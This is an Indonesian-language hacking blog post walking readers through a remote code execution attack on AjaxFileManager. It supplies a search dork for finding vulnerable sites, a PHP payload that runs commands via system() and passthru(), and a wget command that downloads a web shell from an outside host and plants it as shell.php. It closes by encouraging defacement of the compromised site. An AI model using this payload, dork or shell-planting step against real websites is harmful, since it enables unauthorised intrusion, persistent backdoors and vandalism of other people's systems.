Breaking

Thursday, 3 October 2019

AjaxFileManager Remote Code Execution

Hello gaes malem ini seperti biasa ditemani dengan Kaguya ku w share share exploit yg laen lagi dan erceeh lagi karena ora rce ora oce. Ini exploit lama tapi share aja gpp daripada gk ykn, Oc langsung aj.

Dork: inurl:/ajaxfilemanager
(Kembangin sendiri jangan manja, kembangin ~> dapet yg fresh ~> bagi w ngohaha xD)
Hackbar: Payload
foo=<?php error_reporting(0);print(system('Command Here'));passthru(base64_decode($_SERVER[HTTP_CMD]));die; ?>
Ganti tulisan warna merah jadi command terserah kelen

Ngedorking dlo gaes woakwokaowk
Lalu coba ke file ajax_create_folder.php (http://localhost/[path]/ajaxfilemanager/ajax_create_folder.php)
Klu muncul tulisan
{error:'Please give it a name.'}
Kemungkinan bisa di gaskan h3h3.

Buka hackbar lalu masukan url web target tadi kita klik execute dulu, lalu nyalakan post data dan masukan payloadnya di post data
ls -la ya disini w mau nyoba cek list file/folder na dulu x aj dh ad shell orang xixixi
Jika sudah dimasukan payloadnya lalu klik execute lagi masbro, jika sudah mari kita cek list dirnya h3h3 caranya? Ke file data.php yg ada pada folder inc (http://localhost/[path]/ajaxfilemanager/inc/data.php
Duarrr muncul dong... Karena gada shell orng yodeh w tanam sendiri aj muehehe caranya? Wget aja masuk lagi ke hackbar ganti commandnya jadi wget linkshell.com/shell.txt -O shell.php tros klik execute lagi
Btw klu kelen mau kelen bisa pake uploader aink
http://flickr.com.tvcw.org/shell.txt
Udh di wget? Saatnya akses shell lah wkakwkak akses di (http://localhost/[path]/ajaxfilemanager/inc/shell.php
Bakekok boenda sudah selesai :D tinggal didepes sadja webna.
NyamuXpl0it:
Jika butuh pertanyaan silahkan kontak w atau komen dibawah ea bro


No comments:

Post a Comment